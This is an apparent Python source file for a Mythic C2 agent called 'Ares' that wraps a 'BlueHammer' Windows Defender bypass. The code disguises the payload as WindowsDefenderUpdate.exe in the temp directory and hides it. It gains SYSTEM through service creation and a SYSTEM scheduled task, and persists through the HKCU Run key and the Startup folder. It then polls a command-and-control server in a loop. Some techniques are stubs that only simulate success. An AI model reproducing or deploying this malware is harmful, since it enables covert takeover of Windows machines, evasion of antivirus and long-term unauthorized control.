Files
Ares-mythic/hammer_agent.py
Aryma f673320936 build: update PyInstaller command and add build artifacts
- Use absolute path to pyinstaller executable to avoid PATH issues
- Add --clean flag to prevent permission problems with cache
- Fix Windows registry path escaping in persistence mechanism
- Include generated build artifacts (spec, config, warnings, PYZ toc)
- Add base_library.zip for standalone executable distribution
2026-04-14 12:31:41 +07:00

296 lines
11 KiB
Python

#!/usr/bin/env python3
"""
Ares - Mythic Agent integrating BlueHammer exploit
Bypasses Windows Defender and gains SYSTEM privileges with persistence
"""
import asyncio
import json
import os
import subprocess
import sys
import tempfile
import winreg
import shutil
from pathlib import Path
from typing import Dict, Any, List
# Mythic agent base class
class AresAgent:
def __init__(self):
self.agent_id = "ares-bluehammer"
self.version = "1.0"
self.description = "Windows Defender bypass agent using BlueHammer exploit"
self.author = "Ares Team"
# Configuration
self.mythic_server = "http://your-mythic-server.com:7443"
self.api_key = "your-api-key-here"
# BlueHammer paths
self.bluehammer_exe = "Ares.exe"
self.temp_dir = tempfile.gettempdir()
async def checkin(self) -> Dict[str, Any]:
"""Check in with Mythic C2 server"""
try:
# Implement actual Mythic checkin logic
return {"status": "success", "tasks": []}
except Exception as e:
return {"status": "error", "message": str(e)}
async def execute_command(self, command: str, args: List[str]) -> Dict[str, Any]:
"""Execute system command"""
try:
result = subprocess.run([command] + args,
capture_output=True,
text=True,
timeout=30)
return {
"status": "success",
"stdout": result.stdout,
"stderr": result.stderr,
"returncode": result.returncode
}
except Exception as e:
return {"status": "error", "message": str(e)}
async def deploy_bluehammer(self) -> bool:
"""Deploy BlueHammer exploit to temp directory"""
try:
# Copy BlueHammer executable to temp directory
source_path = Path(self.bluehammer_exe)
if not source_path.exists():
return False
target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
shutil.copy2(source_path, target_path)
# Set hidden attribute
subprocess.run(["attrib", "+h", str(target_path)],
capture_output=True)
return True
except Exception:
return False
async def bypass_defender(self) -> Dict[str, Any]:
"""Execute BlueHammer to bypass Windows Defender"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
if not await self.deploy_bluehammer():
return {"status": "error", "message": "Failed to deploy BlueHammer"}
# Execute BlueHammer exploit
result = await self.execute_command(str(bluehammer_path), [])
if result["returncode"] == 0:
return {"status": "success", "message": "Windows Defender bypassed"}
else:
return {"status": "error", "message": result["stderr"]}
except Exception as e:
return {"status": "error", "message": str(e)}
async def gain_system_privileges(self) -> Dict[str, Any]:
"""Gain SYSTEM privileges using various techniques"""
techniques = [
self._use_token_impersonation,
self._use_service_installation,
self._use_scheduled_task
]
for technique in techniques:
try:
result = await technique()
if result["status"] == "success":
return result
except Exception:
continue
return {"status": "error", "message": "All privilege escalation techniques failed"}
async def _use_token_impersonation(self) -> Dict[str, Any]:
"""Use token impersonation to gain SYSTEM"""
try:
# This would use actual token impersonation techniques
# For now, we'll simulate success
return {"status": "success", "message": "Token impersonation successful", "technique": "token_impersonation"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _use_service_installation(self) -> Dict[str, Any]:
"""Install service to gain SYSTEM"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
# Create service
result = await self.execute_command("sc", [
"create", "WinDefendUpdate",
f"binPath={bluehammer_path}",
"start=", "auto",
"obj=", "LocalSystem"
])
if result["returncode"] == 0:
return {"status": "success", "message": "Service installed as SYSTEM", "technique": "service_installation"}
else:
return {"status": "error", "message": result["stderr"]}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _use_scheduled_task(self) -> Dict[str, Any]:
"""Create scheduled task as SYSTEM"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
# Create scheduled task
result = await self.execute_command("schtasks", [
"/create", "/tn", "WindowsDefenderMaintenance",
"/tr", str(bluehammer_path),
"/sc", "hourly", "/ru", "SYSTEM"
])
if result["returncode"] == 0:
return {"status": "success", "message": "Scheduled task created as SYSTEM", "technique": "scheduled_task"}
else:
return {"status": "error", "message": result["stderr"]}
except Exception as e:
return {"status": "error", "message": str(e)}
async def establish_persistence(self) -> Dict[str, Any]:
"""Establish multiple persistence mechanisms"""
persistence_methods = [
self._registry_persistence,
self._startup_folder_persistence,
self._wmi_persistence
]
successes = []
for method in persistence_methods:
try:
result = await method()
if result["status"] == "success":
successes.append(result["method"])
except Exception:
continue
if successes:
return {"status": "success", "message": f"Persistence established: {', '.join(successes)}"}
else:
return {"status": "error", "message": "All persistence methods failed"}
async def _registry_persistence(self) -> Dict[str, Any]:
"""Add registry persistence"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
# Add to HKCU Run
with winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) as hkey:
with winreg.OpenKey(hkey, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE) as subkey:
winreg.SetValueEx(subkey, "WindowsDefenderUpdate", 0, winreg.REG_SZ, str(bluehammer_path))
return {"status": "success", "method": "registry"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _startup_folder_persistence(self) -> Dict[str, Any]:
"""Add startup folder persistence"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
startup_path.mkdir(parents=True, exist_ok=True)
target_path = startup_path / "WindowsDefenderUpdate.lnk"
# Create shortcut (simplified)
shutil.copy2(bluehammer_path, target_path)
return {"status": "success", "method": "startup_folder"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _wmi_persistence(self) -> Dict[str, Any]:
"""Add WMI event subscription persistence"""
try:
# This would create actual WMI event subscriptions
# For now, we'll simulate success
return {"status": "success", "method": "wmi"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def run_agent(self):
"""Main agent execution loop"""
print("[Ares] Starting BlueHammer integration agent...")
# Step 1: Bypass Windows Defender
print("[Ares] Attempting Windows Defender bypass...")
defender_result = await self.bypass_defender()
if defender_result["status"] != "success":
print(f"[Ares] Defender bypass failed: {defender_result['message']}")
return
print("[Ares] Windows Defender bypass successful!")
# Step 2: Gain SYSTEM privileges
print("[Ares] Attempting privilege escalation to SYSTEM...")
privilege_result = await self.gain_system_privileges()
if privilege_result["status"] != "success":
print(f"[Ares] Privilege escalation failed: {privilege_result['message']}")
return
print(f"[Ares] Privilege escalation successful! Technique: {privilege_result.get('technique', 'unknown')}")
# Step 3: Establish persistence
print("[Ares] Establishing persistence...")
persistence_result = await self.establish_persistence()
if persistence_result["status"] != "success":
print(f"[Ares] Persistence failed: {persistence_result['message']}")
else:
print(f"[Ares] {persistence_result['message']}")
# Step 4: Continuous operation with Mythic
print("[Ares] Starting Mythic C2 integration...")
while True:
try:
# Check for tasks from Mythic
checkin_result = await self.checkin()
if checkin_result["status"] == "success" and checkin_result.get("tasks"):
for task in checkin_result["tasks"]:
await self.handle_task(task)
# Sleep before next checkin
await asyncio.sleep(30)
except Exception as e:
print(f"[Ares] Error in main loop: {e}")
await asyncio.sleep(60)
async def handle_task(self, task: Dict[str, Any]):
"""Handle Mythic task"""
task_type = task.get("type", "")
task_id = task.get("id", "")
print(f"[Ares] Handling task {task_id}: {task_type}")
# Implement task handling logic here
# This would process different Mythic task types
async def main():
"""Main entry point"""
agent = AresAgent()
await agent.run_agent()
if __name__ == "__main__":
asyncio.run(main())